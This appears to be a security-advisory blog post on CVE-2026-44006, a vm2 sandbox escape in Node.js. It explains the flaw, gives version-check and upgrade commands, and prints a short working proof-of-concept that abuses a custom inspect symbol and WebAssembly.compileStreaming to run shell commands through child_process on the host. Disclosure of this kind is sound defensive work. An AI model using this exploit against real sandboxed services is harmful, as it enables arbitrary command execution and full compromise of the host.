Listen to this Post
The vulnerability (CVE-2026-44006) allows malicious code to escape the sandbox and execute arbitrary commands on the host system. It is a code injection flaw that abuses the `BaseHandler.getPrototypeOf` mechanism.
Root Cause: The `BaseHandler` class in vm2’s `bridge.js` handles prototype operations. Attackers can reach `BaseHandler.getPrototypeOf` via Node.js’s `util.inspect` function, which can expose internal handler state.
Exploit Chain: By creating a specially crafted object with a custom `inspect` function, an attacker can force the `inspect` function to leak a reference to a host object. This can be achieved by manipulating the `stylize` function within `util.inspect` options, where the handler’s `getPrototypeOf` method becomes accessible.
PoC Mechanism: The PoC manipulates an object’s prototype chain (Buffer.prototype) to gain access to the host `Object` constructor and its symbols. Using getOwnPropertySymbols, the attacker obtains Symbol(nodejs.util.inspect.custom).
Symbol Abuse: Once the internal symbol is obtained, the attacker defines a malicious function for it. This function is invoked when Node.js uses `util.inspect` internally, providing a direct bridge to the host environment.
WebAssembly as a Vector: The attacker triggers this payload via WebAssembly.compileStreaming(obj). The `ERR_INVALID_ARG_TYPE` error generated by `WebAssembly.compileStreaming()` internally triggers util.inspect, which activates the malicious custom inspect function.
Code Execution: The malicious function inside the `inspect` callback then has access to the host’s `Function` constructor. It can spawn a child process using `child_process.execSync` (or a similar pattern), performing a sandbox breakout that leads to Remote Code Execution (RCE).
Context: This vulnerability affects the `patriksimek/vm2` product and is a critical sandbox escape.
dailycve form
Platform: `Node.js/vm2`
Version: `<= 3.10.5`
Vulnerability: `Sandbox Escape RCE`
Severity: `Critical`
Date: `2026-05-07`
Prediction: `Released in 3.11.0`
What Undercode Say
The `CVE-2026-44006` flaw highlights a significant failure in vm2’s isolation logic, specifically in how it handles JavaScript prototypes and host exceptions when processed by Node.js’s internal functions.
Verifying the specific vulnerable version grep '"version":' node_modules/vm2/package.json | grep -E '"3.[0-9]+.[0-9]+"' Checking the current vm2 version npm list vm2 Patching the vulnerability directly npm install [email protected]
How Exploit
The exploit leverages the `util.inspect` mechanism and wasm compilation to breach isolation.
// Malicious object to trigger the vulnerability
let obj = {
[Symbol.for('nodejs.util.inspect.custom')]: (depth, opt, inspect) => {
inspect.constructor("return process.getBuiltinModule('child_process').execSync('id',{stdio:'inherit'})")();
},
valueOf: undefined,
constructor: undefined,
};
WebAssembly.compileStreaming(obj).catch(() => {});
Protection from this CVE
Immediate remediation is required for all environments running untrusted code within a vm2 sandbox.
Upgrade Immediately: Update the vm2 library to version `3.11.0` or later. This version disables the vulnerable prototype exposure.
Input Validation: While not a complete solution, strictly validate any untrusted data entering `WebAssembly.compileStreaming` or `util.inspect` contexts.
Impact
Unpatched versions of the vm2 library (including versions through 3.10.5) are critically at risk.
Sandbox Breakout: Attackers can completely bypass the vm2 sandbox.
Full System Compromise: Successful exploitation provides attackers with the same permissions as the Node.js process, leading to Remote Code Execution (RCE) and full system compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
